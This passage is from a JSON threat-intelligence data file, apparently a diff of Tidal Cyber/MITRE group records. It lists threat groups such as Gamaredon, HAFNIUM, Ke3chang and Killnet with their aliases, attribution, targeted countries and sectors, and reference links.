2018](https://app.tidalcyber.com/references/f47b3e2b-acdd-4487-88b9-de5cbe45cf33)]", + "meta": { + "group_attack_id": "G0084", + "observed_countries": [], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government" + ] + }, + "related": [], + "uuid": "cd483597-4eda-4e16-bb58-353488511410", + "value": "Gallmaker" + }, + { + "description": "[[Unit 42 Gamaredon February 2022](https://app.tidalcyber.com/references/a5df39b2-77f8-4814-8198-8620655aa79b)]", + "meta": { + "id": "05e88887-5044-47d5-a5f0-a13f316f8e5b" + }, + "related": [ + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "similar" + } + ], + "uuid": "24e4dcfa-128c-455f-9eb9-088ec37b31ca", + "value": "Primitive Bear" + }, + { + "description": "[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)]", + "meta": { + "id": "51829cc6-51c3-4dfc-bc75-a9d3252d7734" + }, + "related": [ + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "similar" + } + ], + "uuid": "a5b946ca-ce53-4011-bf46-975390ab31d0", + "value": "Shuckworm" + }, + { + "description": "[[Secureworks IRON TILDEN Profile](https://app.tidalcyber.com/references/45969d87-02c1-4074-b708-59f4c3e39426)]", + "meta": { + "id": "6d5abd74-b676-43d9-b9d2-7832d668fa75" + }, + "related": [ + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "similar" + } + ], + "uuid": "27cc58cd-ad07-4921-9dcc-bd3d81ab4164", + "value": "IRON TILDEN" + }, + { + "description": "[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]", + "meta": { + "id": "21677f2b-d795-4f85-ae84-14a413f3659a" + }, + "related": [ + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "similar" + } + ], + "uuid": "42979c45-dfcb-4be8-8c6b-2428f87fb96b", + "value": "ACTINIUM" + }, + { + "description": "[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)]", + "meta": { + "id": "b9bccf61-d9c9-47e6-8de1-f79b9ac68e62" + }, + "related": [ + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "similar" + } + ], + "uuid": "c06e119e-26b7-46f1-bf6c-35b68f091152", + "value": "Armageddon" + }, + { + "description": "[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]", + "meta": { + "id": "e35e0af5-656b-4227-956b-eb666edaff13" + }, + "related": [ + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "similar" + } + ], + "uuid": "5c73e944-4ec1-4b9f-92c6-134952b224cd", + "value": "DEV-0157" + }, + { + "description": "[Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) comes from a misspelling of the word \"Armageddon\", which was detected in the adversary's early campaigns.[[Palo Alto Gamaredon Feb 2017](https://app.tidalcyber.com/references/3f9a6343-1db3-4696-99ed-f22c6eabee71)][[TrendMicro Gamaredon April 2020](https://app.tidalcyber.com/references/3800cfc2-0260-4b36-b629-7a336b9f9f10)][[ESET Gamaredon June 2020](https://app.tidalcyber.com/references/6532664d-2311-4b38-8960-f43762471729)][[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)][[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]\n\nIn November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) to Russia's Federal Security Service (FSB) Center 18.[[Bleepingcomputer Gamardeon FSB November 2021](https://app.tidalcyber.com/references/c565b025-df74-40a9-9535-b630ca06f777)][[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]", + "meta": { + "country": "RU", + "group_attack_id": "G0047", + "observed_countries": [ + "AL", + "AU", + "AT", + "BD", + "BR", + "CA", + "CL", + "CN", + "CO", + "HR", + "DK", + "GE", + "DE", + "GT", + "HN", + "IN", + "ID", + "IR", + "IL", + "IT", + "JP", + "KZ", + "KR", + "LV", + "MY", + "NL", + "NG", + "NO", + "PK", + "PG", + "PL", + "PT", + "RO", + "RU", + "ZA", + "ES", + "SE", + "TR", + "UA", + "GB", + "US", + "VN" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "NGOs", + "Non Profit" + ] + }, + "related": [ + { + "dest-uuid": "1a77e156-76bc-43f5-bdd7-bd67f30fbbbb", + "type": "similar" + }, + { + "dest-uuid": "24e4dcfa-128c-455f-9eb9-088ec37b31ca", + "type": "similar" + }, + { + "dest-uuid": "a5b946ca-ce53-4011-bf46-975390ab31d0", + "type": "similar" + }, + { + "dest-uuid": "27cc58cd-ad07-4921-9dcc-bd3d81ab4164", + "type": "similar" + }, + { + "dest-uuid": "42979c45-dfcb-4be8-8c6b-2428f87fb96b", + "type": "similar" + }, + { + "dest-uuid": "c06e119e-26b7-46f1-bf6c-35b68f091152", + "type": "similar" + }, + { + "dest-uuid": "5c73e944-4ec1-4b9f-92c6-134952b224cd", + "type": "similar" + } + ], + "uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "value": "Gamaredon Group" + }, + { + "description": "[GCMAN](https://app.tidalcyber.com/groups/dbc85db0-937d-47d7-9002-7364d41be48a) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. [[Securelist GCMAN](https://app.tidalcyber.com/references/1f07f234-50f0-4c1e-942a-a01d3f733161)]", + "meta": { + "group_attack_id": "G0036", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Financial Services" + ] + }, + "related": [ + { + "dest-uuid": "d93889de-b4bc-4a29-9ce7-d67717c140a0", + "type": "similar" + } + ], + "uuid": "dbc85db0-937d-47d7-9002-7364d41be48a", + "value": "GCMAN" + }, + { + "description": "[[CrowdStrike Evolution of Pinchy Spider July 2021](https://app.tidalcyber.com/references/7578541b-1ae3-58d0-a8b9-120bd6cd96f5)]", + "meta": { + "id": "01341fff-9dbd-5a1e-ae91-18fb56f2d943" + }, + "related": [ + { + "dest-uuid": "b4d068ac-9b68-4cd8-bf0c-019f910ef8e3", + "type": "similar" + } + ], + "uuid": "7f1fa605-10cc-5317-a88c-b174f3ad7596", + "value": "Pinchy Spider" + }, + { + "description": "[GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.[[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)][[Secureworks GandCrab and REvil September 2019](https://app.tidalcyber.com/references/46b5d57b-17be-48ff-b723-406f6a55d84a)][[Secureworks GOLD SOUTHFIELD](https://app.tidalcyber.com/references/01d1ffaa-16b3-41c4-bb5a-afe2b41f1142)][[CrowdStrike Evolution of Pinchy Spider July 2021](https://app.tidalcyber.com/references/7578541b-1ae3-58d0-a8b9-120bd6cd96f5)]", + "meta": { + "group_attack_id": "G0115", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "7f1fa605-10cc-5317-a88c-b174f3ad7596", + "type": "similar" + } + ], + "uuid": "b4d068ac-9b68-4cd8-bf0c-019f910ef8e3", + "value": "GOLD SOUTHFIELD" + }, + { + "description": "[Gorgon Group](https://app.tidalcyber.com/groups/efb3b5ac-cd86-44a2-9de1-02e4612b8cc2) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [[Unit 42 Gorgon Group Aug 2018](https://app.tidalcyber.com/references/d0605185-3f8d-4846-a718-15572714e15b)]", + "meta": { + "country": "PK", + "group_attack_id": "G0078", + "observed_countries": [ + "RU", + "ES", + "GB", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government" + ] + }, + "related": [ + { + "dest-uuid": "e47c2c4d-706b-4098-92a2-b93e7103e131", + "type": "similar" + } + ], + "uuid": "efb3b5ac-cd86-44a2-9de1-02e4612b8cc2", + "value": "Gorgon Group" + }, + { + "description": "[Group5](https://app.tidalcyber.com/groups/fcc6d937-8cd6-4f2c-adb8-48caedbde70a) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://app.tidalcyber.com/groups/fcc6d937-8cd6-4f2c-adb8-48caedbde70a) has used two commonly available remote access tools (RATs), [njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) and [NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1), as well as an Android RAT, DroidJack. [[Citizen Lab Group5](https://app.tidalcyber.com/references/ffbec5e8-947a-4363-b7e1-812dfd79935a)]", + "meta": { + "group_attack_id": "G0043", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "bc8390aa-8c4e-11e9-a9cb-e37c361210af", + "type": "similar" + } + ], + "uuid": "fcc6d937-8cd6-4f2c-adb8-48caedbde70a", + "value": "Group5" + }, + { + "description": "[[Volexity Exchange Marauder March 2021](https://app.tidalcyber.com/references/ef0626e9-281c-4770-b145-ffe36e18e369)]", + "meta": { + "id": "df9d2cd4-0d5d-4c66-8fe6-4268d17dd35d" + }, + "related": [ + { + "dest-uuid": "1bcc9382-ccfe-4b04-91f3-ef1250df5e5b", + "type": "similar" + } + ], + "uuid": "956cc6a9-b4e2-40ec-aa22-5dc90e2ab2d0", + "value": "Operation Exchange Marauder" + }, + { + "description": "[HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.[[Microsoft HAFNIUM March 2020](https://app.tidalcyber.com/references/6a986c46-79a3-49c6-94d2-d9b1f5db08f3)][[Volexity Exchange Marauder March 2021](https://app.tidalcyber.com/references/ef0626e9-281c-4770-b145-ffe36e18e369)]", + "meta": { + "country": "CN", + "group_attack_id": "G0125", + "observed_countries": [ + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Education", + "Legal", + "NGOs", + "Think Tanks" + ] + }, + "related": [ + { + "dest-uuid": "4f05d6c1-3fc1-4567-91cd-dd4637cc38b5", + "type": "similar" + }, + { + "dest-uuid": "956cc6a9-b4e2-40ec-aa22-5dc90e2ab2d0", + "type": "similar" + } + ], + "uuid": "1bcc9382-ccfe-4b04-91f3-ef1250df5e5b", + "value": "HAFNIUM" + }, + { + "description": "[[SecureWorks August 2019](https://app.tidalcyber.com/references/573edbb6-687b-4bc2-bc4a-764a548633b5)]", + "meta": { + "id": "e623a904-bd7d-4c22-a6d2-73172e6905b2" + }, + "related": [ + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "similar" + } + ], + "uuid": "140137f2-039a-4ade-a043-039b2093e25e", + "value": "Lyceum" + }, + { + "description": "[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)]", + "meta": { + "id": "10fda21c-e31e-4336-ad27-f8fc56af4286" + }, + "related": [ + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "similar" + } + ], + "uuid": "05b6f4a6-e54d-42db-a47e-4bcfae56c0f6", + "value": "Siamesekitten" + }, + { + "description": "[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]", + "meta": { + "id": "19a29b1a-d82e-47cd-930c-2af4f66d918e" + }, + "related": [ + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "similar" + } + ], + "uuid": "16662d03-d9bf-448d-9fef-40af53a2bc76", + "value": "Spirlin" + }, + { + "description": "[HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735)'s TTPs appear similar to [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac) and [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) but due to differences in victims and tools it is tracked as a separate entity.[[Dragos Hexane](https://app.tidalcyber.com/references/11838e67-5032-4352-ad1f-81ba0398a14f)][[Kaspersky Lyceum October 2021](https://app.tidalcyber.com/references/b3d13a82-c24e-4b47-b47a-7221ad449859)][[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)][[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]", + "meta": { + "group_attack_id": "G1001", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "140137f2-039a-4ade-a043-039b2093e25e", + "type": "similar" + }, + { + "dest-uuid": "05b6f4a6-e54d-42db-a47e-4bcfae56c0f6", + "type": "similar" + }, + { + "dest-uuid": "16662d03-d9bf-448d-9fef-40af53a2bc76", + "type": "similar" + } + ], + "uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "value": "HEXANE" + }, + { + "description": "[Higaisa](https://app.tidalcyber.com/groups/f1477581-d485-403f-a95f-c56bf88c5d1e) is a threat group suspected to have South Korean origins. [Higaisa](https://app.tidalcyber.com/groups/f1477581-d485-403f-a95f-c56bf88c5d1e) has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. [Higaisa](https://app.tidalcyber.com/groups/f1477581-d485-403f-a95f-c56bf88c5d1e) was first disclosed in early 2019 but is assessed to have operated as early as 2009.[[Malwarebytes Higaisa 2020](https://app.tidalcyber.com/references/6054e0ab-cf61-49ba-b7f5-58b304477451)][[Zscaler Higaisa 2020](https://app.tidalcyber.com/references/26d7ee2c-d4f7-441a-9073-49c9049b017e)][[PTSecurity Higaisa 2020](https://app.tidalcyber.com/references/cf8f3d9c-0d21-4587-a707-46848a15bd46)]", + "meta": { + "country": "KR", + "group_attack_id": "G0126", + "observed_countries": [ + "CN", + "JP", + "KP", + "PL", + "RU" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government" + ] + }, + "related": [], + "uuid": "f1477581-d485-403f-a95f-c56bf88c5d1e", + "value": "Higaisa" + }, + { + "description": "[[Symantec Inception Framework March 2018](https://app.tidalcyber.com/references/166f5c44-7d8c-45d5-8d9f-3b8bd21a2af3)]", + "meta": { + "id": "e5049581-6e7a-4ef4-a437-b6505b51faa0" + }, + "related": [ + { + "dest-uuid": "d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6", + "type": "similar" + } + ], + "uuid": "42936511-3367-4000-b700-cba2ed0a5c6c", + "value": "Inception Framework" + }, + { + "description": "[[Kaspersky Cloud Atlas December 2014](https://app.tidalcyber.com/references/41a9b3e3-0953-4bde-9e1d-c2f51de1120e)]", + "meta": { + "id": "66df8607-fd7c-49d8-b6f5-5519a200077b" + }, + "related": [ + { + "dest-uuid": "d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6", + "type": "similar" + } + ], + "uuid": "ec26e42e-45f7-4d88-ae4b-f141dd03e192", + "value": "Cloud Atlas" + }, + { + "description": "[Inception](https://app.tidalcyber.com/groups/d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.[[Unit 42 Inception November 2018](https://app.tidalcyber.com/references/5cb98fce-f386-4878-b69c-5c6440ad689c)][[Symantec Inception Framework March 2018](https://app.tidalcyber.com/references/166f5c44-7d8c-45d5-8d9f-3b8bd21a2af3)][[Kaspersky Cloud Atlas December 2014](https://app.tidalcyber.com/references/41a9b3e3-0953-4bde-9e1d-c2f51de1120e)]", + "meta": { + "group_attack_id": "G0100", + "observed_countries": [ + "BE", + "BG", + "FR", + "GE", + "IR", + "KE", + "MY", + "MD", + "RU", + "ZA", + "SR", + "TR", + "UA", + "GB", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [ + "291c006e-f77a-4c9c-ae7e-084974c0e1eb" + ], + "target_categories": [ + "Aerospace", + "Defense", + "Energy", + "Government", + "Media" + ] + }, + "related": [ + { + "dest-uuid": "71ef51ca-a791-11e8-a026-07980ca910ca", + "type": "similar" + }, + { + "dest-uuid": "42936511-3367-4000-b700-cba2ed0a5c6c", + "type": "similar" + }, + { + "dest-uuid": "ec26e42e-45f7-4d88-ae4b-f141dd03e192", + "type": "similar" + } + ], + "uuid": "d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6", + "value": "Inception" + }, + { + "description": "[IndigoZebra](https://app.tidalcyber.com/groups/988f5312-834e-48ea-93b7-e6e01ee0938d) is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.[[HackerNews IndigoZebra July 2021](https://app.tidalcyber.com/references/fcf8265a-3084-4162-87d0-9e77c0a5cff0)][[Checkpoint IndigoZebra July 2021](https://app.tidalcyber.com/references/cf4a8c8c-eab1-421f-b313-344aed03b42d)][[Securelist APT Trends Q2 2017](https://app.tidalcyber.com/references/fe28042c-d289-463f-9ece-1a75a70b966e)]", + "meta": { + "country": "CN", + "group_attack_id": "G0136", + "observed_countries": [ + "AF", + "KG", + "UZ" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government" + ] + }, + "related": [], + "uuid": "988f5312-834e-48ea-93b7-e6e01ee0938d", + "value": "IndigoZebra" + }, + { + "description": "[[Crowdstrike EvilCorp March 2021](https://app.tidalcyber.com/references/4b77d313-ef3c-4d2f-bfde-609fa59a8f55)][[Treasury EvilCorp Dec 2019](https://app.tidalcyber.com/references/074a52c4-26d9-4083-9349-c14e2639c1bc)]", + "meta": { + "id": "c7f362ba-2ba3-4adc-bae7-186cebe57a17" + }, + "related": [ + { + "dest-uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "type": "similar" + } + ], + "uuid": "bc61566f-d467-43bd-bea8-b04d6eb26318", + "value": "Evil Corp" + }, + { + "description": "[Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) initially started with the [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d), [WastedLocker](https://app.tidalcyber.com/software/0ba6ee8d-2b29-4980-8e55-348ea05f00ad), and Hades ransomware. Following U.S. sanctions and an indictment in 2019, [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) changed their tactics and diversified their toolset.[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)][[Crowdstrike EvilCorp March 2021](https://app.tidalcyber.com/references/4b77d313-ef3c-4d2f-bfde-609fa59a8f55)][[Treasury EvilCorp Dec 2019](https://app.tidalcyber.com/references/074a52c4-26d9-4083-9349-c14e2639c1bc)]", + "meta": { + "country": "RU", + "group_attack_id": "G0119", + "observed_countries": [ + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "c9c73000-30a5-4a16-8c8b-79169f9c24aa", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Healthcare", + "Insurance" + ] + }, + "related": [ + { + "dest-uuid": "bc61566f-d467-43bd-bea8-b04d6eb26318", + "type": "similar" + } + ], + "uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "value": "Indrik Spider" + }, + { + "description": "[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)][[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)]", + "meta": { + "id": "54d5de05-eb9c-43ed-a842-9ea5febf0f07" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "similar" + } + ], + "uuid": "3c0dfd27-fc7a-48c5-a431-6f62f3f9319a", + "value": "Vixen Panda" + }, + { + "description": "[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)][[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)]", + "meta": { + "id": "9d256af2-5d63-46f0-8955-d92fa9de9fad" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "similar" + } + ], + "uuid": "6231a5a9-ca9a-435e-abf3-a78478484513", + "value": "Playful Dragon" + }, + { + "description": "[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]", + "meta": { + "id": "85d2f1ad-bd89-4bd4-96b9-59372240393c" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "similar" + } + ], + "uuid": "fa320745-a2e5-4f54-8cb6-c0056e18805e", + "value": "APT15" + }, + { + "description": "[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]", + "meta": { + "id": "6269d7b4-0684-40b5-b50d-2ec1208f2283" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "similar" + } + ], + "uuid": "95a17f0a-d6ca-4d82-add7-96f97104a471", + "value": "Mirage" + }, + { + "description": "[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]", + "meta": { + "id": "80510930-523c-4f80-8be0-f150a2811b06" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "similar" + } + ], + "uuid": "85d23b10-4d88-41b5-a1e6-628faf4dfcdd", + "value": "GREF" + }, + { + "description": "[[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)]", + "meta": { + "id": "5ea8cd55-276b-4ef0-bfcd-cab7fc2f6e3d" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "similar" + } + ], + "uuid": "53e4969e-6d5f-447a-b589-cf4ec546985b", + "value": "RoyalAPT" + }, + { + "description": "[[Microsoft NICKEL December 2021](https://app.tidalcyber.com/references/29a46bb3-f514-4554-ad9c-35f9a5ad9870)]", + "meta": { + "id": "852e49f7-6e42-4cc9-b642-4033cf7731c2" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "similar" + } + ], + "uuid": "dac81780-75d0-4e20-91a5-d6f9f4e21de3", + "value": "NICKEL" + }, + { + "description": "[Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) is a threat group attributed to actors operating out of China. [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.[[Mandiant Operation Ke3chang November 2014](https://app.tidalcyber.com/references/bb45cf96-ceae-4f46-a0f5-08cd89f699c9)][[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)][[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)][[Microsoft NICKEL December 2021](https://app.tidalcyber.com/references/29a46bb3-f514-4554-ad9c-35f9a5ad9870)]", + "meta": { + "country": "CN", + "group_attack_id": "G0004", + "observed_countries": [ + "AF", + "AR", + "BB", + "BE", + "BA", + "BR", + "BG", + "CL", + "CN", + "CO", + "HR", + "CZ", + "DO", + "EC", + "EG", + "SV", + "FR", + "GT", + "HN", + "HU", + "IN", + "ID", + "IR", + "IT", + "JM", + "KZ", + "KW", + "MY", + "ML", + "MX", + "ME", + "PK", + "PA", + "PE", + "PT", + "SA", + "SK", + "CH", + "SY", + "TT", + "TR", + "GB", + "US", + "UZ", + "VE" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Energy", + "Government", + "Media", + "NGOs" + ] + }, + "related": [ + { + "dest-uuid": "3501fbf2-098f-47e7-be6a-6b0ff5742ce8", + "type": "similar" + }, + { + "dest-uuid": "3c0dfd27-fc7a-48c5-a431-6f62f3f9319a", + "type": "similar" + }, + { + "dest-uuid": "6231a5a9-ca9a-435e-abf3-a78478484513", + "type": "similar" + }, + { + "dest-uuid": "fa320745-a2e5-4f54-8cb6-c0056e18805e", + "type": "similar" + }, + { + "dest-uuid": "95a17f0a-d6ca-4d82-add7-96f97104a471", + "type": "similar" + }, + { + "dest-uuid": "85d23b10-4d88-41b5-a1e6-628faf4dfcdd", + "type": "similar" + }, + { + "dest-uuid": "53e4969e-6d5f-447a-b589-cf4ec546985b", + "type": "similar" + }, + { + "dest-uuid": "dac81780-75d0-4e20-91a5-d6f9f4e21de3", + "type": "similar" + } + ], + "uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "value": "Ke3chang" + }, + { + "description": "Killnet is an apparent hacktivist collective that has primarily used distributed denial of service (DDoS) attacks in support of its ideology, which appears to largely align with Russian state interests. The group emerged in October 2021, initially offering DDoS capabilities as a for-hire service. However, after the February 2022 Russian invasion of Ukraine, Killnet explicitly pledged allegiance to Russia and began to threaten and claim responsibility for attacks on targets in Ukraine and in countries perceived to support Ukraine. To date, the group has claimed and is believed to be responsible for a considerable number of DDoS attacks on government and private sector targets in a range of sectors, using a variety of discrete techniques to carry them out. It is also believed to be behind a smaller number of data exfiltration-focused attacks, and it has promoted the use of defacement tools in its communication channels with supporters.[[Flashpoint Glossary Killnet](/references/502cc03b-350b-4e2d-9436-364c43a0a203)]\n\nIn October 2023, following a series of air- and land-based attacks in the Gaza Strip, researchers observed Killnet claiming responsibility for disruptive attacks against computer networks in Israel and pledging explicit support for Palestinian interests.[[RyanW3stman Tweet October 10 2023](/references/cfd0ad64-54b2-446f-9624-9c90a9a94f52)]", + "meta": { + "group_attack_id": "G5009", + "observed_countries": [ + "BE", + "CZ", + "EE", + "DE", + "IT", + "LT", + "PL", + "RO", + "UA", + "GB", + "US" + ], + "observed_motivations": [], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "62bde669-3020-4682-be68-36c83b2588a4" + ], + "target_categories": [ + "Aerospace", + "Banks", + "Energy", + "Government", + "Healthcare", + "Media", + "Transportation" + ] + }, + "related": [], + "uuid": "35fb7663-5c5d-43fe-a507-49612aa7960e", + "value": "Killnet" + }, + { + "description": "[[Netscout Stolen Pencil Dec 2018](https://app.tidalcyber.com/references/6d3b31da-a784-4da0-91dd-b72c04fd520a)]", + "meta": { + "id": "48a0ecdd-62c2-45bf-897d-ebb600c024e8" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "similar" + } + ], + "uuid": "11901dae-ceb9-4469-8529-f517d6489ca8", + "value": 